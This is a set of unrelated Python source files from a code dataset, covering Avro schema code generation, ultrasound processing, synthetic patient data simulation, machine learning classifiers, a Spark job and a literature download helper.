logging.getLogger('avrogen.schema')\nlogger.setLevel(logging.INFO)\n\n\ndef generate_schema(schema_json, use_logical_types=False, custom_imports=None, avro_json_converter=None):\n \"\"\"\n Generate file containing concrete classes for RecordSchemas in given avro schema json\n :param str schema_json: JSON representing avro schema\n :param list[str] custom_imports: Add additional import modules\n :param str avro_json_converter: AvroJsonConverter type to use for default values\n :return Dict[str, str]:\n \"\"\"\n\n if avro_json_converter is None:\n avro_json_converter = 'avrojson.AvroJsonConverter'\n\n if '(' not in avro_json_converter:\n avro_json_converter += '(use_logical_types=%s, schema_types=__SCHEMA_TYPES)' % use_logical_types\n\n custom_imports = custom_imports or []\n names = schema.Names()\n make_avsc_object(json.loads(schema_json), names)\n\n names = [k for k in six.iteritems(names.names) if isinstance(k[1], (schema.RecordSchema, schema.EnumSchema))]\n names = sorted(names, key=lambda x: x[0])\n\n main_out = StringIO()\n writer = TabbedWriter(main_out)\n\n write_preamble(writer, use_logical_types, custom_imports)\n write_schema_preamble(writer)\n write_get_schema(writer)\n write_populate_schemas(writer)\n\n writer.write('\\n\\n\\nclass SchemaClasses(object):')\n writer.tab()\n writer.write('\\n\\n')\n\n current_namespace = tuple()\n\n for name, field_schema in names: # type: str, schema.Schema\n name = clean_fullname(name)\n namespace = tuple(name.split('.')[:-1])\n if namespace != current_namespace:\n start_namespace(current_namespace, namespace, writer)\n current_namespace = namespace\n if isinstance(field_schema, schema.RecordSchema):\n logger.debug('Writing schema: %s', clean_fullname(field_schema.fullname))\n write_schema_record(field_schema, writer, use_logical_types)\n elif isinstance(field_schema, schema.EnumSchema):\n logger.debug('Writing enum: %s', field_schema.fullname)\n write_enum(field_schema, writer)\n writer.write('\\npass\\n')\n writer.set_tab(0)\n writer.write('\\n__SCHEMA_TYPES = {\\n')\n writer.tab()\n\n for name, field_schema in names:\n writer.write(\"'%s': SchemaClasses.%sClass,\\n\" % (clean_fullname(field_schema.fullname), clean_fullname(field_schema.fullname)))\n\n writer.untab()\n writer.write('\\n}\\n')\n\n writer.write('_json_converter = %s\\n\\n' % avro_json_converter)\n\n value = main_out.getvalue()\n 
main_out.close()\n return value, [clean_fullname(name[0]) for name in names]\n\n\ndef write_schema_preamble(writer):\n \"\"\"\n Writes a schema-specific preamble: __get_names_and_schema() which is used by concrete classes to resolve\n their own RecordSchema\n :param writer:\n :return:\n \"\"\"\n write_read_file(writer)\n writer.write('\\n\\ndef __get_names_and_schema(file_name):')\n with writer.indent():\n writer.write('\\nnames = avro_schema.Names()')\n writer.write('\\nschema = make_avsc_object(json.loads(__read_file(file_name)), names)')\n writer.write('\\nreturn names, schema')\n writer.write('\\n\\n__NAMES, SCHEMA = __get_names_and_schema(os.path.join(os.path.dirname(__file__), \"schema.avsc\"))')\n\n\ndef write_populate_schemas(writer):\n \"\"\"\n Writes out a __SCHEMAS dict which contains all RecordSchemas by their full name. Used by get_schema_type\n :param writer:\n :return:\n \"\"\"\n writer.write('\\n__SCHEMAS = dict((n.fullname.lstrip(\".\"), n) for n in six.itervalues(__NAMES.names))')\n\n\ndef write_namespace_modules(ns_dict, output_folder):\n \"\"\"\n Writes content of the generated namespace modules. A python module will be created for each namespace\n and will import concrete schema classes from SchemaClasses\n :param ns_dict:\n :param output_folder:\n :return:\n \"\"\"\n for ns in six.iterkeys(ns_dict):\n with open(os.path.join(output_folder, ns.replace('.', os.path.sep), \"__init__.py\"), \"w+\") as f:\n currency = '.'\n if ns != '':\n currency += '.' * len(ns.split('.'))\n f.write('from {currency}schema_classes import SchemaClasses\\n'.format(currency=currency))\n for name in ns_dict[ns]:\n f.write(\"{name} = SchemaClasses.{ns}{name}Class\\n\".format(name=name, ns=ns if not ns else (ns + \".\")))\n\n\ndef write_specific_reader(record_types, output_folder, use_logical_types):\n \"\"\"\n Writes specific reader for a avro schema into generated root module\n :param record_types:\n :param output_folder:\n :return:\n \"\"\"\n with open(os.path.join(output_folder, \"__init__.py\"), \"a+\") as f:\n writer = TabbedWriter(f)\n writer.write('\\n\\nfrom .schema_classes import SchemaClasses, SCHEMA as my_schema, get_schema_type')\n writer.write('\\nfrom avro.io import DatumReader')\n if use_logical_types:\n writer.write('\\nfrom avrogen import logical')\n\n write_reader_impl(record_types, writer, use_logical_types)\n\n\ndef write_schema_files(schema_json, output_folder, use_logical_types=False, custom_imports=None):\n \"\"\"\n Generates concrete classes, namespace modules, and a SpecificRecordReader for a given avro schema\n :param str schema_json: JSON containing avro schema\n :param str output_folder: Folder in which to create generated files\n :param list[str] custom_imports: Add additional import modules\n :return:\n \"\"\"\n schema_py, names = generate_schema(schema_json, use_logical_types, custom_imports)\n names = sorted(names)\n\n if not os.path.isdir(output_folder):\n os.mkdir(output_folder)\n\n with open(os.path.join(output_folder, \"schema_classes.py\"), \"w+\") as f:\n f.write(schema_py)\n\n with open(os.path.join(output_folder, \"schema.avsc\"), \"w+\") as f:\n f.write(schema_json)\n\n ns_dict = generate_namespace_modules(names, output_folder)\n\n with open(os.path.join(output_folder, \"__init__.py\"), \"w+\") as f:\n pass # make sure we create this file from scratch\n\n write_namespace_modules(ns_dict, output_folder)\n write_specific_reader(names, output_folder, 
use_logical_types)\n","sub_path":"avrogen/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":6721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"319236022","text":"from output_data import *\nfrom process_data import *\nfrom read_data import *\nimport argparse\n\nmetadata = ()\n\n\ndef main():\n \"\"\"Main function to use user inputs and run all functions\n\n \"\"\"\n args = parser_cli()\n\n RFbinaryFilename = args.RFbinaryFilename\n JSONFilename = args.JSONFilename\n display = args.display\n save = args.save\n\n data = readBinary(RFbinaryFilename)\n fs, c, axial_samples, num_beams, beam_spacing = readJSON(JSONFilename)\n\n centered_data = center_data(data)\n rectified_data = rectify_data(centered_data)\n\n filtered_data = low_pass_filter(rectified_data, 15)\n data_compress = log_compression(filtered_data)\n\n processed_data = reshape_process(data_compress, axial_samples, num_beams)\n\n if display:\n Display(processed_data, num_beams, beam_spacing, axial_samples, fs, c)\n if save:\n Save(processed_data, num_beams, beam_spacing, axial_samples, fs, c)\n\n\ndef parser_cli():\n \"\"\"Argparser to take user input arguments\n\n :param argument 0: RF binary filename\n :param argument 1: JSON binary filename\n :param argument 2: display boolean option\n :param argument 3: save boolean option\n :returns: RFbinaryFilename(string), JSONFilename(string)\n \"\"\"\n parser = argparse.ArgumentParser(description='B-mode Ultrasound Imaging.')\n parser.add_argument('--RFbinaryFilename',\n dest=\"RFbinaryFilename\",\n default='rfdat.bin')\n\n parser.add_argument('--JSONFilename',\n dest=\"JSONFilename\",\n default='bmode.json')\n\n parser.add_argument('--display', default=False,\n type=bool, dest=\"display\",\n help='Boolean input argument to render B-mode image')\n\n parser.add_argument('--save', default=True,\n type=bool, dest=\"save\",\n help='Boolean input argument to save PNG B-mode image')\n\n args = parser.parse_args()\n\n return args\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"argparse_func.py","file_name":"argparse_func.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"221084632","text":"import numpy as np\nimport codecs\nfrom faker import Faker\n\nfrom mlxtend.preprocessing import one_hot\nName = []\nAge = np.arange(60,90)\nGender = np.arange(0,2)\nHeight = np.arange(150,190,5)\nWeight = np.arange(60,120,5)\nAddress = np.arange(4000,5000,1)\nPhoneNum = []\nEmail = []\nBSN = []\nOccupation = []\nMarital = np.arange(0,7)\ntime = np.arange(1,100)\nbloodP = np.arange(70,190,10)\nGlucose = np.arange(3,8)\nMedicalHist = []\nWearable = np.arange(1000,7000,200)\nPreSensorK = np.arange(0,2)\nPreSensorB = np.arange(0,2)\nPreSensorBa = np.arange(0,2)\nPreSensorL = np.arange(0,2)\nTemperature = np.arange(18,26)\nLights = np.arange(0,2)\nWindow = np.arange(0,2)\nIntruder = np.arange(0,2)\nElectricity = np.arange(1000,7000,200)\nExternalGate = np.arange(0,2)\n\n\n# f = open('source.txt', encoding='utf-8', errors='ignore')\n# lines = f.readlines()\n# name = []\n# for xx in lines:\n#\n# print(xx)\n# input(\"wait\")\n\nf = codecs.open('name.txt', encoding='utf-8', errors='ignore')\nlines = f.readlines()\nname = []\nfor xx in lines:\n\n name.append(xx.lstrip().rstrip().lower())\n\nf = codecs.open('diseases.txt', encoding='utf-8', errors='ignore')\nlines = f.readlines()\ndis = []\nfor xx in lines:\n\n 
dis.append(xx.rstrip())\n\n\n\ndef myround(x, base=5):\n    return int(base * round(float(x)/base))\n\n\nusers = []\nuser = \"\"\nuser1 =\"\"\nuser2 = \"\"\nuser3 = \"\"\nuser4 = \"\"\nmaxl = 0\n\nf0 = open('source.txt', 'w')\nf1 = open('view1.txt', 'w')\nf2 = open('view2.txt', 'w')\nf3 = open('view3.txt', 'w')\nf4 = open('view4.txt', 'w')\nf00 = open('sourceTest.txt', 'w')\nf11 = open('view1Test.txt', 'w')\nf22 = open('view2Test.txt', 'w')\nf33 = open('view3Test.txt', 'w')\nf44 = open('view4Test.txt', 'w')\nfake = Faker()\n# for nn in range(len(name)):\nfor numg in range(20000):\n    # print(fake.name())\n\n    gname = fake.name()\n    user = user + \"n\" + \":\"+ gname + \"|\"\n    user1 = user1 + \"n\" + \":\"+ \"*\" + \"|\"\n    user2 = user2 + \"n\" + \":\"+ gname + \"|\"\n    user3 = user3 + \"n\" + \":\"+ \"*\" + \"|\"\n    user4 = user4 + \"n\" + \":\" + gname + \"|\"\n\n\n\n    age = np.random.randint(60,90)\n    user = user+ \"a\" + \":\"+str(age) + \"|\"\n    user1 = user1 + \"a\" + \":\" + str(age) + \"|\"\n    user2 = user2 + \"a\" + \":\" + str(int(age/10)) +\"*\" + \"|\"\n    user3 = user3 + \"a\" + \":\" + str(int(age/10)) +\"*\" + \"|\"\n    user4 = user4 + \"a\" + \":\" + str(myround(age)) + \"|\"\n\n\n\n\n\n\n    gen = [\"m\",\"f\"]\n    gender = np.random.randint(0,2)\n    user = user+ \"g\" + \":\"+ str(gen[gender]) + \"|\"\n    user1 = user1 + \"g\" + \":\" + str(gen[gender]) + \"|\"\n    user2 = user2 + \"g\" + \":\" + str(gen[gender]) + \"|\"\n    user3 = user3 + \"g\" + \":\" + str(gen[gender]) + \"|\"\n    user4 = user4 + \"g\" + \":\" + str(gen[gender]) + \"|\"\n\n\n\n\n    height = np.random.randint(150,190)\n    user = user+ \"h\" + \":\"+str(height) + \"|\"\n    user1 = user1 + \"h\" + \":\" + str(height) + \"|\"\n    user2 = user2 + \"h\" + \":\" + str(height) + \"|\"\n    user3 = user3 + \"h\" + \":\" + str(myround(height)) + \"|\"\n    user4 = user4 + \"h\" + \":\" + str(myround(height)) + \"|\"\n\n\n    weight = np.random.randint(60,120)\n    user = user+ \"w\" + \":\"+ str(weight) + \"|\"\n\n    user1 = user1 + \"w\" + \":\" + str(weight) + \"|\"\n    user2 = user2 + \"w\" + \":\" + str(weight) + \"|\"\n    user3 = user3 + \"w\" + \":\" + str(myround(weight)) + \"|\"\n    user4 = user4 + \"w\" + \":\" + str(myround(weight)) + \"|\"\n\n\n    zip = np.random.randint(10000,99000)\n    user = user+ \"ad\" + \":\"+str(zip) + \"|\"\n\n    user1 = user1 + \"ad\" + \":\" + str(zip) + \"|\"\n    user2 = user2 + \"ad\" + \":\" + str(myround(zip,1000)) + \"|\"\n    user3 = user3 + \"ad\" + \":\" + str(zip) + \"|\"\n    user4 = user4 + \"ad\" + \":\" + str(myround(zip,1000)) + \"|\"\n\n\n    phone = np.random.randint(1000000,9999999)\n    user = user+ \"ph\" + \":\"+str(phone) + \"|\"\n    user1 = user1 + \"ph\" + \":\" + str(phone) + \"|\"\n    user2 = user2 + \"ph\" + \":\" + str(phone) + \"|\"\n    user3 = user3 + \"ph\" + \":\" + str(phone) + \"|\"\n    user4 = user4 + \"ph\" + \":\" + \"unk\" + \"|\"\n\n\n    mar = np.random.randint(0,7)\n    user = user+ \"m\" + \":\"+ str(mar) + \"|\"\n\n    user1 = user1+ \"m\" + \":\"+ str(mar) + \"|\"\n    if mar >0:\n        mar = 1\n    user2 = user2+ \"m\" + \":\"+ str(mar) + \"|\"\n    user3 = user3+ \"m\" + \":\"+ str(mar) + \"|\"\n    user4 = user4+ \"m\" + \":\"+ str(mar) + \"|\"\n\n\n\n    occ = np.random.randint(0,20)\n    user = user+ \"oc\" + \":\"+ str(occ) + \"|\"\n    user1 = user1 + \"oc\" + \":\" + str(occ) + \"|\"\n    user2 = user2 + \"oc\" + \":\" + str(occ%5) + \"|\"\n    user3 = user3 + \"oc\" + \":\" + str(occ%5) + \"|\"\n    user4 = user4 + \"oc\" + \":\" + str(occ%5) + \"|\"\n\n\n    nn = np.random.randint(0,len(dis))\n    user = user+ \"ds\" + \":\"+ dis[nn] + \"|\"\n    user1 = 
user1 + \"ds\" + \":\" + dis[nn] + \"|\"\n user2 = user2 + \"ds\" + \":\" + dis[nn] + \"|\"\n user3 = user3 + \"ds\" + \":\" + dis[nn] + \"|\"\n diss = dis[nn]\n if nn >0 and nn<6:\n diss = \"heart\"\n if nn >6 and nn<11:\n diss = \"lung\"\n if nn >11 and nn<15:\n diss = \"dementia\"\n\n\n user4 = user4 + \"ds\" + \":\" + diss + \"|\"\n\n\n tuser = user\n tuser1 = user1\n tuser2 = user2\n tuser3 = user3\n tuser4 = user4\n\n # for i in range(1,2500):\n\n # user = tuser\n # user1 = tuser1\n # user2 = tuser2\n # user3 = tuser3\n # user4 = tuser4\n\n # user = user + \"ts\" + \":\" + str(i) + \"|\"\n # user1 = user1 + \"ts\" + \":\" + str(i) + \"|\"\n # user2 = user2 + \"ts\" + \":\" + str(i) + \"|\"\n # user3 = user3 + \"ts\" + \":\" + str(i) + \"|\"\n # user4 = user4 + \"ts\" + \":\" + str(i) + \"|\"\n\n bp = np.random.randint(70, 190)\n user = user + \"bp\" + \":\" + str(bp) + \"|\"\n user1 = user1 + \"bp\" + \":\" + str(130) + \"|\"\n user2 = user2 + \"bp\" + \":\" + str(bp) + \"|\"\n user3 = user3 + \"bp\" + \":\" + str(bp) + \"|\"\n user4 = user4 + \"bp\" + \":\" + str(130) + \"|\"\n\n\n gc = np.random.randint(3, 8)\n user = user + \"gc\" + \":\" + str(gc) + \"|\"\n user1 = user1 + \"gc\" + \":\" + str(5) + \"|\"\n user2 = user2 + \"gc\" + \":\" + str(gc) + \"|\"\n user3 = user3 + \"gc\" + \":\" + str(gc) + \"|\"\n user4 = user4 + \"gc\" + \":\" + str(5) + \"|\"\n\n we = np.random.randint(1000,7000)\n user = user + \"we\" + \":\" + str(we) + \"|\"\n user1 = user1 + \"we\" + \":\" + str(we) + \"|\"\n user2 = user2 + \"we\" + \":\" + str(we) + \"|\"\n user3 = user3 + \"we\" + \":\" + str(we) + \"|\"\n user4 = user4 + \"we\" + \":\" + str(we) + \"|\"\n\n sen = np.random.randint(1, 5)\n user = user + \"ss\" + \":\" + str(sen) + \"|\"\n user1 = user1 + \"ss\" + \":\" + str(sen) + \"|\"\n user2 = user2 + \"ss\" + \":\" + \"unk\" + \"|\"\n user3 = user3 + \"ss\" + \":\" + str(sen) + \"|\"\n user4 = user4 + \"ss\" + \":\" + str(sen) + \"|\"\n\n\n temp = np.random.randint(16, 30)\n user = user + \"tp\" + \":\" + str(temp) + \"|\"\n user1 = user1 + \"tp\" + \":\" + str(temp) + \"|\"\n user2 = user2 + \"tp\" + \":\" + str(temp) + \"|\"\n user3 = user3 + \"tp\" + \":\" + str(temp) + \"|\"\n user4 = user4 + \"tp\" + \":\" + str(myround(temp)) + \"|\"\n\n light = np.random.randint(1, 5)\n user = user + \"l\" + \":\" + str(light) + \"|\"\n user1 = user1 + \"l\" + \":\" + str(light) + \"|\"\n user2 = user2 + \"l\" + \":\" + \"unk\" + \"|\"\n user3 = user3 + \"l\" + \":\" + \"unk\" + \"|\"\n user4 = user4 + \"l\" + \":\" + str(light) + \"|\"\n\n window = np.random.randint(1, 3)\n user = user + \"win\" + \":\" + str(window) + \"|\"\n\n user1 = user1 + \"wn\" + \":\" + str(window) + \"|\"\n user2 = user2 + \"wn\" + \":\" + \"unk\" + \"|\"\n user3 = user3 + \"wn\" + \":\" + str(window) + \"|\"\n user4 = user4 + \"wn\" + \":\" + \"unk\" + \"|\"\n\n\n # i = np.random.randint(0, 2)\n # user = user + \"int\" + \":\" + str(i) + \"|\"\n # user1 = user1 + \"int\" + \":\" + str(i) + \"|\"\n # user2 = user2 + \"int\" + \":\" + \"unk\" + \"|\"\n # user3 = user3 + \"int\" + \":\" + str(i) + \"|\"\n # user4 = user4 + \"int\" + \":\" + \"unk\" + \"|\"\n\n\n el = np.random.randint(1000,7000)\n user = user + \"el\" + \":\" + str(el) + \"|\"\n user1 = user1 + \"el\" + \":\" + str(myround(el,500)) + \"|\"\n user2 = user2 + \"el\" + \":\" + \"unk\" + \"|\"\n user3 = user3 + \"el\" + \":\" + \"unk\" + \"|\"\n user4 = user4 + \"el\" + \":\" + str(myround(el,500)) + \"|\"\n\n\n\n\n ext = np.random.randint(0, 2)\n user = user + 
\"ex\" + \":\" + str(ext) + \"|\"\n user1 = user1 + \"ex\" + \":\" + str(ext) + \"|\"\n user2 = user2 + \"ex\" + \":\" + \"unk\" + \"|\"\n user3 = user3 + \"ex\" + \":\" + str(ext) + \"|\"\n user4 = user4 + \"ex\" + \":\" + \"unk\" + \"|\"\n\n user = user + \"eos\"\n user1 = user1 + \"eos\"\n user2 = user2 + \"eos\"\n user3 = user3 + \"eos\"\n user4 = user4 + \"eos\"\n\n\n if len(user)>maxl:\n maxl = len(user)\n\n\n if numg<100000:\n\n #print(user ,file = f0)\n print(f0),user\n\n\n #print(user1 , file=f1)\n print(f1), user1\n\n #print(user2 , file=f2)\n print(f2), user2\n\n #print(user3 , file=f3)\n print(f3), user3\n\n #print(user4, file=f4)\n print(f4), user4\n else:\n #print(user ,file = f00)\n print(f00), user\n\n\n #print(user1 , file=f11)\n print(f11), user1\n\n #print(user2 , file=f22)\n print(f22), user2\n\n\n #print(user3 , file=f33)\n print(f33), user3\n\n #print(user4, file=f44)\n print(f44), user4\n\n\n\n\n user = \"\"\n user1 = \"\"\n user2 = \"\"\n user3 = \"\"\n user4 = \"\"\nprint(maxl)\nf0.close()\nf1.close()\nf2.close()\nf3.close()\nf4.close()\n\nf00.close()\nf11.close()\nf22.close()\nf33.close()\nf44.close()","sub_path":"Simulator.py","file_name":"Simulator.py","file_ext":"py","file_size_in_byte":9123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"631122542","text":"import info\n\n\nclass subinfo(info.infoclass):\n def setTargets(self):\n for ver in [\"3.4\", \"3.5\"]:\n self.targets[ver] = f\"http://deb.debian.org/debian/pool/main/x/x265/x265_{ver}.orig.tar.gz\"\n self.targetInstSrc[ver] = f\"x265_{ver}/source\"\n self.patchToApply[ver] = [(\"mingw-no-pdb.patch\", 1)]\n self.targetDigests[\"3.4\"] = ([\"c2047f23a6b729e5c70280d23223cb61b57bfe4ad4e8f1471eeee2a61d148672\"], CraftHash.HashAlgorithm.SHA256)\n self.targetDigests[\"3.5\"] = ([\"e70a3335cacacbba0b3a20ec6fecd6783932288ebc8163ad74bcc9606477cae8\"], CraftHash.HashAlgorithm.SHA256)\n self.description = \"H.265/HEVC video stream encoder\"\n self.defaultTarget = \"3.5\"\n\n def setDependencies(self):\n self.runtimeDependencies[\"virtual/base\"] = None\n self.buildDependencies[\"dev-utils/nasm\"] = None\n\n\nfrom Package.CMakePackageBase import *\n\n\nclass Package(CMakePackageBase):\n def __init__(self, **args):\n CMakePackageBase.__init__(self)\n self.subinfo.options.configure.args = \"-DEXPORT_C_API=ON -DENABLE_SHARED=ON -DENABLE_ASSEMBLY=ON -DENABLE_CLI=OFF\"\n","sub_path":"libs/x265/x265.py","file_name":"x265.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"365276405","text":"from jinja2 import Environment, FileSystemLoader\nimport os \nimport glob\nroot = os.path.dirname(os.path.abspath(__file__))\ntemplates_dir = os.path.join(root, 'templates')\nenv = Environment( loader = FileSystemLoader(templates_dir) )\ntemplate = env.get_template('imageview.html')\n \n \nfilename = os.path.join(root,'upload/static','imageview_updated.html')\nslitted_path = root.split(\"/\")\nimage_path = os.path.join(\"/\".join(slitted_path[:-1]),'instance/images/')\nimage_path2 = '../../../instance/images/'\nlocations = []\nfor folder in glob.glob(image_path + \"*/\"):\n\tprint(folder.split(\"/\")[-2])\n\tlocations.append(image_path2 + folder.split(\"/\")[-2] + \"/thumbnail.png\")\n\tprint(locations)\n\nwith open(filename, 'w') as fh:\n fh.write(template.render(\n paths = locations,\n ))\n 
#https://code-maven.com/minimal-example-generating-html-with-python-jinja","sub_path":"app/gen_image_views.py","file_name":"gen_image_views.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"111591780","text":"import torch\nimport torch.nn as nn\nfrom torch.nn import init\nimport torch.nn.functional as F\n\nclass Encoder(nn.Module):\n \"\"\"\n Encodes a node's using 'convolutional' GraphSage approach\n \"\"\"\n def __init__(self, feature_dim, \n embed_dim, adj_lists, aggregator, \n feature_transform=False): \n super(Encoder, self).__init__()\n\n self.feat_dim = feature_dim\n self.adj_lists = adj_lists\n self.aggregator = aggregator\n\n self.embed_dim = embed_dim\n self.weight = nn.Parameter(\n torch.FloatTensor(feature_dim, embed_dim))\n init.xavier_uniform(self.weight)\n \n self.bn = nn.BatchNorm1d(embed_dim)\n self.relu = nn.LeakyReLU()\n\n def forward(self, raw_features, nodes):\n \"\"\"\n Generates embeddings for a batch of nodes.\n\n nodes -- list of nodes\n \"\"\"\n\n neigh_feats = self.aggregator.forward(raw_features, nodes, [self.adj_lists[node] for node in nodes])\n\n x = neigh_feats.mm(self.weight)\n x = self.bn(x)\n x = self.relu(x)\n return x\n","sub_path":"graphsage/parcellation_encoders.py","file_name":"parcellation_encoders.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"145062801","text":"import pandas as pd\nfrom sklearn.metrics import mean_squared_error as mse\n\nwsp = pd.read_csv('../tmp/wqs_2017-12-21-11-02-16-0.0432.csv',header=None)\nlgb = pd.read_csv('../result/result_20171225.csv',header=None)\nresult = pd.DataFrame()\n\nresult['ID'] = wsp[0]\nresult['Y'] = 2.0 / (1.0 / wsp[1] + 1.0/lgb[1])\n\nresult[['ID','Y']].to_csv('../result/result_20171227_h_lgb_xgb.csv',index=False,header=False)\n","sub_path":"201704TO201802CodeBackup-master/201704TO201802CodeBackup-master/201801_Tianchi_工业AI第一赛季/code/2.simply_merge.py","file_name":"2.simply_merge.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"56475640","text":"import pandas as pd\nimport numpy as np\n\ndata = np.array([\n [1, 1, 0],\n [1, 1, 0],\n [1, 1, 1],\n [0, 0, 2],\n [0, 1, 0],\n [0, 0, 2]])\n\ndf = pd.DataFrame(data, columns=['EdibleOrPoisonous', 'RedColor', 'CapSurface'])\nprint(df)\n\ntrain_df = df.copy()\ncol = np.array(['RedColor', 'CapSurface'])\nfor f in range(1, df.shape[1]):\n for elem in df.iloc[:, f].unique():\n train_df[col[f-1]+'_'+str(elem) ] = (train_df.iloc[:, f]==elem)+0.0\n\ntrain_df = train_df.drop(columns=col)\nprint(train_df)\n\n\nX = train_df.iloc[:, 1:].values\ny = train_df.iloc[:, 0].values\n\nfrom sklearn.naive_bayes import MultinomialNB\nclf = MultinomialNB(alpha=0)\nclf.fit(X, y)\nclf.predict_proba(np.array( [[1,0,1,0,0]] ))\n\nclf = MultinomialNB(alpha=0)\nclf.fit(X, y)\np = clf.predict_proba(np.array([[1,0,0,1,0]]))\nprint(p)\n\nfrom sklearn.naive_bayes import MultinomialNB\nclf=MultinomialNB(alpha=1)\nclf.fit(X, y)\np = clf.predict_proba(np.array( [[1,0,0,1,0]] ) )\nprint(p)\n\n\n#*********************REAL Example*****************\ndf = pd.read_csv('./mushrooms.csv')\nfrom sklearn.utils import shuffle\n\ndf = shuffle(df, random_state=42)\nprint(df)\n\n\ntrain_df = df[:7000]\ntest_df = df[7000:]\n\nprint(train_df)\n\n\n# from this we can derive the accuracy of the majority class 
classifier\nprint(train_df['class'].value_counts(normalize=1))\n\ntarget = []\nfor i in range(len(train_df['class'].values)):\n if train_df['class'].values[i]=='e':\n target.append(0)\n if train_df['class'].values[i]=='p':\n target.append(1)\n if train_df['class'].values[i]=='u':\n target.append(2)\n\ntarget = np.array(target)\nprint(target)\n\ndel train_df['class']\n\n#we transform inputs for multinomialNB\ncols = list(train_df)\nprint(\"cols--->\", cols)\nfor f in cols:\n for elem in df[f].unique():\n train_df[f+'_'+str(elem)] = (train_df[f]==elem)\n\n#we delete old columns\nprint(\"Before deleting---->\", train_df)\nfor f in cols:\n del train_df[f]\nprint(\"after deleting----->\", train_df)\ntrain_df.head()\ntrain_df=train_df+0.0\nprint(\"after adding 0.0.----->\", train_df)\n\n\nfrom sklearn.naive_bayes import MultinomialNB\n\nclf = MultinomialNB()\ntrain_x = train_df.values\nclf.fit(train_x, target)\n\nfrom sklearn.metrics import accuracy_score\ny_pred = clf.predict(train_x)\na = accuracy_score(y_pred, target)\nprint(a)\n\n\ntest_y = test_df['class']\ndel test_df['class']\nfor f in cols:\n for elem in df[f].unique():\n test_df[f+'_'+str(elem)] = (test_df[f]==elem)\n\nfor f in cols:\n del test_df[f]\n\nprint(test_df)\n\ntest_x = test_df.values\n\ntest_y1=[]\nfor i in range(len(test_y)):\n if test_y.values[i] == 'e':\n test_y1.append(0)\n if test_y.values[i] == 'p':\n test_y1.append(1)\n if test_y.values[i] == 'u':\n test_y1.append(2)\n\ntest_y1 = np.array(test_y1)\n\ny_pred = clf.predict(test_x)\naccuracy_score(y_pred, test_y1)\n\nfrom sklearn.metrics import confusion_matrix\nCC = confusion_matrix(test_y1, y_pred)\nprint(CC)\n\n\n\n\n\n\n","sub_path":"mushroom_classification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"264410710","text":"#!/usr/bin/env python\n\nimport sys\nfrom csv import reader\n\n\nparking = sc.textFile(sys.argv[1], 1)\nparking = parking.mapPartitions(lambda x: reader(x))\n\nplateid_state = parking.map(lambda x: ((x[14], x[16]), 1))\ntotal_plateid_state = plateid_state.reduceByKey(lambda x, y: x + y)\n\n# get the top 20 vehicles with the greatest number of violations\nsorted_list = total_plateid_state.sortBy(lambda x: (-x[1], x[0][0]))\ngreatest = sc.parallelize(sorted_list.take(20))\ngreatest = greatest.map(lambda x: (x[0][0], x[0][1], x[1]))\n\n# output\noutput = greatest.map(lambda x: x[0] + ', ' + x[1] + '\\t' + str(x[2]))\noutput.saveAsTextFile('task6.out')","sub_path":"task6/task6.py","file_name":"task6.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"325340965","text":"import configparser\nimport json\nimport time\nimport zipfile\nimport io\nimport copy\nimport os\nimport logging\nimport requests\nimport pandas as pd\nimport xmltodict\nfrom tqdm import tqdm\nfrom dict2xml import dict2xml\n\n\nclass DownloadTools:\n \"\"\"Generic tools for retrieving literature\"\"\"\n\n def __init__(self, api):\n \"\"\"[summary]\n\n :param api: [description]\n :type api: [type]\n \"\"\"\n with open(\n os.path.join(os.path.dirname(__file__), \"config.ini\")\n ) as file_handler:\n config_file = file_handler.read()\n config = configparser.RawConfigParser(allow_no_value=True)\n config.read_string(config_file)\n\n self.posturl = config.get(api, \"posturl\")\n self.citationurl = config.get(api, \"citationurl\")\n self.referencesurl = config.get(api, 
\"referencesurl\")\n self.xmlurl = config.get(api, \"xmlurl\")\n self.zipurl = config.get(api, \"zipurl\")\n self.suppurl = config.get(api, \"suppurl\")\n\n def postquery(self, headers, payload):\n \"\"\"\n\n :param headers: headers that will be sent to eupmc rest api\n :param payload: payload that will be sent to eupmc rest api\n :returns: Python dictionary containting the output got from eupmc rest api\n\n \"\"\"\n logging.debug(\"*/RESTful request for fulltext.xml (D)*/\")\n start = time.time()\n request_handler = requests.post(\n self.posturl, data=payload, headers=headers)\n stop = time.time()\n logging.debug(\"*/Got the Query Result */\")\n logging.debug(\"Time elapsed: %s\", (stop - start))\n return xmltodict.parse(request_handler.content)\n\n @staticmethod\n def check_or_make_directory(directory_url):\n \"\"\"Checks if the directory exists. If not, makes the directory\n\n :param directory_url: directory url to check\n\n \"\"\"\n if not os.path.isdir(directory_url):\n os.makedirs(directory_url)\n\n @staticmethod\n def buildquery(\n cursormark,\n page_size,\n query,\n synonym=True,\n ):\n \"\"\"\n\n :param cursormark: the cursonmark for the rest api page.\n :param page_size: the size of each page in the output.\n :param query: the query passed on to payload\n :param synonym: whether synonym should be or not (Default value = True)\n :returns: headers': headers, 'payload': payload}\n :rtype: Python dictionary containting headers and payload in the format\n\n \"\"\"\n\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\"}\n payload = {\n \"query\": query,\n \"resultType\": \"core\",\n \"cursorMark\": cursormark,\n \"pageSize\": page_size,\n \"synonym\": synonym,\n \"format\": \"xml\",\n \"sort_PMCID\": \"y\",\n }\n logging.debug(\"*/submitting RESTful query (I)*/\")\n return {\"headers\": headers, 